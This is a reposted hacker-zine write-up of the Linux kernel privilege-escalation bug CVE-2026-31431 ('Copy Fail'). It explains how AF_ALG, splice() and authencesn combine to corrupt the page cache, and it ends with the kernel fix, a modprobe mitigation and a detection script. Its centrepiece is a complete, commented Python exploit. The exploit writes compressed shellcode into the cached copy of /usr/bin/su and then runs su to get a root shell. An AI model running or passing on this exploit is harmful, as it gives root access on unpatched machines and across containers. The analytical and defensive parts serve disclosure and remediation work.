732-Bytes to Pwn Linux Kernel
This is a zine repost.
https://ghspace.fr/zine/old/732_bytes_to_pwn_linux_kernel.txt

|=-----------------------------------------------------------------------=|
|=----------------=[ 732-bytes to pwn linux kernel ]=--------------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ Beemo ]=--------------------------------=|
|=-----------------------------------------------------------------------=|

--[ Table of Contents

  0x01 - Intro
  0x02 - Dramatis Personae - subsystems
  0x03 - The bug nobody saw for 9 years
  0x04 - authencesn, ya cheating little bastard
  0x05 - From 1000 to 0
  0x06 - Proof of concept
  0x07 - Howtf nobody noticed
  0x08 - The fix (4 lines)
  0x09 - Thoughts on copyfail
  0x0a - References

--[ 0x01 - Intro

  "Every so often, a bug comes along that makes you question whether
   anyone ever reads the code they're committing to."

Every kernel LPE starts the same way. Here's another race condition.
Here's the window. Here's the heap spray. Here's the KASLR leak. Here's
the stack pivot and yada yada yada. Good luck making it work twice.

Copyfail (CVE-2026-31431) - recently found by Taeyang Lee with a little
help from AI - doesn't do any of that.

No race. No heap spray. No KASLR bypass. No ROP chain. No compiled binary.

Just a logic flaw sitting in plain sight since 2017, weaponizable in 732
bytes of Python, yielding a juicy root shell on every major distro shipped
in the last nine years. You don't even need to be fast. Just a loop, four
bytes at a time, from a Python script.

So, how does it work?

--[ 0x02 - Dramatis Personae - subsystems

Three kernel subsystems walk into a bar. They've never met. Each one is
fine alone; together they give any local user a 4-byte write primitive
(write4) into the page cache of any readable file O_o

[*] AF_ALG

AF_ALG (address family 38) is a socket type that exposes the kernel's
crypto subsystem to userspace, with no capabilities required.
Any user can open one, bind to any registered alg template, and run
encrypt/decrypt operations. It exists so userspace can offload crypto to
hw accelerators without needing a kernel module per application. In
practice, almost nobody uses it. OpenSSL's afalg engine is off by default,
but most distros compile it in anyway.

>>> a = socket.socket(38, 5, 0)  # AF_ALG, SOCK_SEQPACKET
>>> a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))

[*] splice()

splice() moves data between fds and pipes without copying. When you splice
FROM a file, the pipe doesn't get a copy of the data. It gets a reference
to the page cache page. The actual physical page.

>>> splice(file_fd -> pipe)   # pipe now holds page cache ref
>>> splice(pipe -> alg_fd)    # alg socket now holds page cache ref

When you then splice from the pipe into another fd (like our AF_ALG
socket), those page cache references travel into the crypto subsystem's
scatterlist. That scatterlist now contains direct pointers to the physical
pages that back every read(), mmap(), and execve() of that file on the
entire system.

[*] authencesn

authencesn is an AEAD wrapper. It exists for IPsec Extended Sequence
Numbers (RFC 4303), where 64-bit sequence numbers are split across the
AAD. The wrapper has to rearrange bytes for the HMAC computation. To do
that, it uses the caller's output buffer as scratch space, writing 4 bytes
past the end of the legitimate output area.

--[ 0x03 - The bug nobody saw for 9 years

In the old code (pre-2017), src and dst were separate. Page cache pages
were in src (read side). The output went to dst (user buffer). Safe.

In 2017, commit 72548b093ee3 added an optimization to algif_aead.c:
perform AEAD operations in-place. For decryption, the code now:

  - Copies AAD and ciphertext from the TX scatterlist (which may contain
    page cache pages from splice) into the RX buffer (the user's recvmsg
    buffer).
  - Does NOT copy the authentication tag.
    Instead, it chains the tag pages from the TX scatterlist onto the
    end of the RX scatterlist using sg_chain().
  - Sets req->src = req->dst (both point to the same combined
    scatterlist).

    req->src ----+
                 |
                 v
    req->dst --> [ AAD || CT ] --> [ Tag (page cache pages) ]
                 ^^^^^^^^^^^^^     ^^^^^^^^^^^^^^^^^^^^^^^^^^
                  \ RX buffer       \ chained from TX SGL
                    (user mem)        (file's page cache)

The output scatterlist now has a writable zone (the RX buffer) followed
immediately by page cache pages of whatever file was spliced in. Nothing
enforces the boundary between them. Nothing documents this as a
constraint. It's a silent invariant that every AEAD algorithm is expected
to honor.

Every AEAD algorithm indeed... except one.

--[ 0x04 - authencesn, ya cheating little bastard

authencesn handles IPsec Extended Sequence Numbers. The 64-bit seqno is
split into hi (bytes 0-3) and lo (bytes 4-7) of the AAD. During decrypt,
it needs to rearrange these bytes for the HMAC. Instead of allocating a
scratch buffer, it uses the caller's destination scatterlist as a notepad:

crypto_authenc_esn_decrypt() ->

>>> // read first 8 bytes of AAD (seqno_hi || seqno_lo)
>>> scatterwalk_map_and_copy(tmp, dst, 0, 8, 0);
>>>
>>> // write seqno_hi at dst[4..7] (within AAD, fine)
>>> scatterwalk_map_and_copy(tmp, dst, 4, 4, 1);
>>>
>>> // write seqno_lo at dst[assoclen + cryptlen] (PAST THE END)
>>> scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);
                                           ^^^^^^^^^^^^^^^^^^^
                                            \ bug here!

That third write goes 4 bytes past the legitimate output boundary.
scatterwalk_map_and_copy() faithfully walks the scatterlist, hits the
sg_chain boundary, maps the page cache page via kmap_local_page(), and
writes 4 bytes of payload data directly into the kernel's cached copy of
the target file.

The HMAC check runs and fails (the ciphertext is garbage - don't care),
and recvmsg() returns -EBADMSG. Nobody checks the page cache. The
corrupted page is never marked dirty. The file on disk is unchanged.
But every subsequent read of that file, from any process, from any
container, sees the corrupted version.

--[ 0x05 - From 1000 to 0

The full sequence:

  1. Open socket(AF_ALG), bind to authencesn(hmac(sha256),cbc(aes)).
     Set a key. Accept a request socket.

  2. Open /usr/bin/su (or any setuid binary) for reading.

  3. For each 4-byte chunk of your shellcode:

     a. sendmsg(AAD[8 bytes], cmsg=[DECRYPT, IV, ASSOCLEN=8], MSG_MORE)

        Where bytes[4:8] = the 4 bytes to write.
        Set assoclen, IV, etc. via cmsg headers.

     b. splice() from /usr/bin/su into a pipe, then from the pipe into
        the AF_ALG socket.

        splice(target_fd -> pipe, offset=target_page_offset, len=32)
        splice(pipe -> op_fd, len=32)

        Choose the offset so that the tag region aligns with your target
        offset in su's .text section.

     c. recv(op_fd)
        ^^^^^^^^^^^
         \ -EBADMSG, but scratch write already fired

        Triggers the decrypt. authencesn writes your 4 bytes into the
        page cache. HMAC fails. recv() returns an error. The page cache
        is corrupted. Move to the next chunk.

  4. execve("/usr/bin/su"). The kernel loads su from the page cache.
     Your shellcode is in .text. su is setuid root.

Congrats, you are now root :D

Every process reading that file through the page cache sees the
corruption. execve() loads from the page cache. getpwnam() reads from the
page cache, but the on-disk file is untouched. fsck is clean, tripwire is
clean, AIDE is clean, because nothing was written to disk.

No races to win. No timing windows. No kernel version checks. No
arch-specific gadgets. The same script works on:

  Ubuntu 24.04    (6.17.0-1007-aws)
  Amazon Linux    (6.18.8-9.213.amzn2023)
  RHEL 10.1       (6.12.0-124.45.1.el10_1)
  SUSE 16         (6.12.0-160000.9-default)

...and every other distro that ships the default kernel config with
AF_ALG enabled.

--[ 0x06 - Proof of concept

The full exploit is 732 bytes minified, but I'll add some comments for
context.
You can find the original one here: https://github.com/theori-io/copy-fail-CVE-2026-31431 --8<-- cut here ---------------------------------------------------[[ BEGIN #!/usr/bin/env python3 import os as g, zlib, socket as s def d(x): return bytes.fromhex(x) # htob def c(f, t, c): # f = fd of target file (/usr/bin/su) # t = offset within file to write at # c = 4 bytes to write (shellcode chunk) # Open AF_ALG socket, bind authencesn # socket(family=AF_ALG, type=SOCK_SEQPACKET, proto=0) # https://docs.python.org/3/library/socket.html#socket.socket a = s.socket(38, 5, 0) a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))")) h = 279 # SOL_ALG # Set key: 8 bytes key header + 32 bytes AES-256 key v = a.setsockopt v(h, 1, d('0800010000000010' + '0'*64)) # Set AAD len = 0 (no additional assoclen opt) v(h, 5, None, 4) # Accept request fd u, _ = a.accept() o = t + 4 # offset adjustment # sendmsg() # (AAD = b"A"*4 + seqno_lo) # (SOL_ALG, ALG_SET_OP) = decrypt (0x00 * 4) # (SOL_ALG, ALG_SET_IV) = 16 null bytes # (SOL_ALG, ALG_SET_AEAD_ASSOCLEN) = 8 i = d('00') u.sendmsg( [b"A"*4 + c], # AAD with payload in seqno_lo [ (h, 3, i*4), # ALG_SET_OP = decrypt (h, 2, b'\x10' + i*19), # ALG_SET_IV = 16 zero bytes (h, 4, b'\x08' + i*3), # AEAD_ASSOCLEN = 8 ], 32768 # MSG_MORE ) # splice target file pages into AF_ALG socket r, w = g.pipe() n = g.splice n(f, w, o, offset_src=0) # file -> pipe (page cache refs!) 
n(r, u.fileno(), o) # pipe -> AF_ALG socket # trigger decrypt (authencesn writes seqno_lo into page cache) try: u.recv(8 + t) except: pass # EBADMSG expected f = g.open("/usr/bin/su", 0) # O_RDONLY i = 0 # Decompress shellcode (execve("/bin/sh") or similar) e = zlib.decompress(d( "78daab77f57163626464800126063b0610af82c101cc7760c004" "0e0c160c301d209a154d16999e07e5c1680601086578c0f0ff86" "4c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa4999" "79fac5190c0c0c0032c310d3" )) # Write shellcode 4 bytes at a time into su's page cache while i < len(e): c(f, i, e[i:i+4]) i += 4 # Execute the corrupted setuid binary g.system("su") # Dang, you root :D --8<-- cut here -----------------------------------------------------[[ EOS Usage: $ python3 copy_fail_exp.py $ id uid=0(root) gid=1002(user) groups=1002(user) That's it. 732 bytes. Every distro. Every time. --[ 0x07 - Howtf nobody noticed Well...the bug exists because of 3 independently reasonable changes by three different developers across six years: 2011: authencesn added to support IPsec ESN (a5079d084f8b). The scratch write at dst[assoclen+cryptlen] is harmless - the only caller is the in-kernel xfrm layer, and src/dst are separate scatterlists. Nobody outside the kernel ever touches this code. 2015: AF_ALG gains AEAD support (algif_aead.c). splice() can now deliver page cache pages into the crypto scatterlist. authencesn is converted to the new AEAD API (104880a6b470). But AF_ALG uses out-of-place: req->src != req->dst. Page cache pages are in src (read-only). The scratch write goes to dst. Still not exploitable as is. 2017: In-place optimization (72548b093ee3). req->src = req->dst. Page cache tag pages are chained into the writable destination via sg_chain(). authencesn's scratch write now crosses from the RX buffer into page cache pages. The corruption is silent - no crash, no kernel log, no visible side effect except the page cache being wrong. It doesn't trigger any existing kernel self check. No KASAN or UBSAN. 
No lockdep. No page flags. The kernel doesn't know the page is corrupted
because the write went through a legitimate code path
(scatterwalk_map_and_copy) on a page that was legitimately mapped.

--[ 0x08 - The fix (4 lines)

Commit a664bf3d603d reverts algif_aead.c to out-of-place operation:

diff --git a/before b/after
index aff63c7..9ca2c95 100644
--- a/before
+++ b/after
@@ -1,5 +1,5 @@
 aead_request_set_crypt(
     &areq->cra_u.aead_req,
-    rsgl_src,                         // RX SGL (same as dst)
-    areq->first_rsgl.sgl.sgt.sgl,     // RX SGL
+    tsgl_src,                         // TX SGL (src)
+    areq->first_rsgl.sgl.sgt.sgl,     // RX SGL (dst, separate)
     used, ctx->iv);

The commit message:

  "There is no benefit in operating in-place in algif_aead since the
   source and destination come from different mappings."

You can temporarily mitigate (as root) if you're not able to patch yet:

# echo "install algif_aead /bin/false" \
    > /etc/modprobe.d/disable-algif-aead.conf
# rmmod algif_aead 2>/dev/null

This kills the AF_ALG AEAD socket type. You'll break apps, yes, but only
those that explicitly bind aead sockets via AF_ALG, which in practice is
almost none.

--[ 0x09 - Thoughts on copyfail

Copyfail might be the cleanest kernel LPE in recent history. It doesn't
need a race. It doesn't need a spray. Definitely no leaks. It doesn't even
need a compiled binary.

A 732-byte Python script, using only stdlib modules, gets you root on
every major Linux distribution shipped since 2017. The same script crosses
container boundaries because the page cache is host-wide.
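
Back to the mitigation from 0x08 for a second. Here is a minimal sketch,
not an official tool, for checking whether a box still has algif_aead
loaded and whether an "install ... /bin/false" override is configured. The
helper names (module_loaded, install_blocked, read_text) are hypothetical
and mine. It assumes /proc/modules and /etc/modprobe.d/*.conf are where
your distro keeps this information.

```python
import glob

MODULE = "algif_aead"  # module named in the 0x08 mitigation


def module_loaded(proc_modules_text, name=MODULE):
    """True if `name` is the first field of any /proc/modules line."""
    for line in proc_modules_text.splitlines():
        fields = line.split()
        if fields and fields[0] == name:
            return True
    return False


def install_blocked(conf_text, name=MODULE):
    """True if modprobe config text overrides `name` with /bin/false or /bin/true."""
    for raw in conf_text.splitlines():
        fields = raw.split("#", 1)[0].split()  # drop comments, tokenize
        if len(fields) < 3 or fields[0] != "install":
            continue
        # modprobe treats '-' and '_' in module names as equivalent
        same_module = fields[1].replace("-", "_") == name
        if same_module and fields[2] in ("/bin/false", "/bin/true"):
            return True
    return False


def read_text(path):
    """Read a file as text, returning '' if it cannot be opened."""
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""


if __name__ == "__main__":
    loaded = module_loaded(read_text("/proc/modules"))
    blocked = any(install_blocked(read_text(p))
                  for p in sorted(glob.glob("/etc/modprobe.d/*.conf")))
    print("algif_aead loaded:          ", loaded)
    print("install override configured:", blocked)
```

Caveat: if the AEAD interface is built into the kernel rather than shipped
as a module, neither check tells you anything, and the modprobe override
will not help either. Patch instead.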

--[ 0x0a - References

[1] CVE-2026-31431 disclosure
    https://copy.fail/

[2] Xint Code write-up
    https://xint.io/blog/copy-fail-linux-distributions

[3] PoC source
    https://github.com/theori-io/copy-fail-CVE-2026-31431

[4] Kernel fix (a664bf3d603d)
    https://github.com/torvalds/linux/commit/a664bf3d603d

[5] In-place optimization commit (72548b093ee3)
    https://github.com/torvalds/linux/commit/72548b093ee3

[6] authencesn original commit (a5079d084f8b)
    https://github.com/torvalds/linux/commit/a5079d084f8b

|=-----------------------------------------------------------------------=|
|=-----------------------------------------------------------------------=|
|                                                                         |
|   Beemo                                                                 |
|   nflatrea@mailo.com                                                    |
|   https://nflatrea.bearblog.dev                                         |
|   Made with <3                                                          |
|                                                                         |
|=-----------------------------------------------------------------------=|
|=-----------------------------------------------------------------------=|

--[ EOF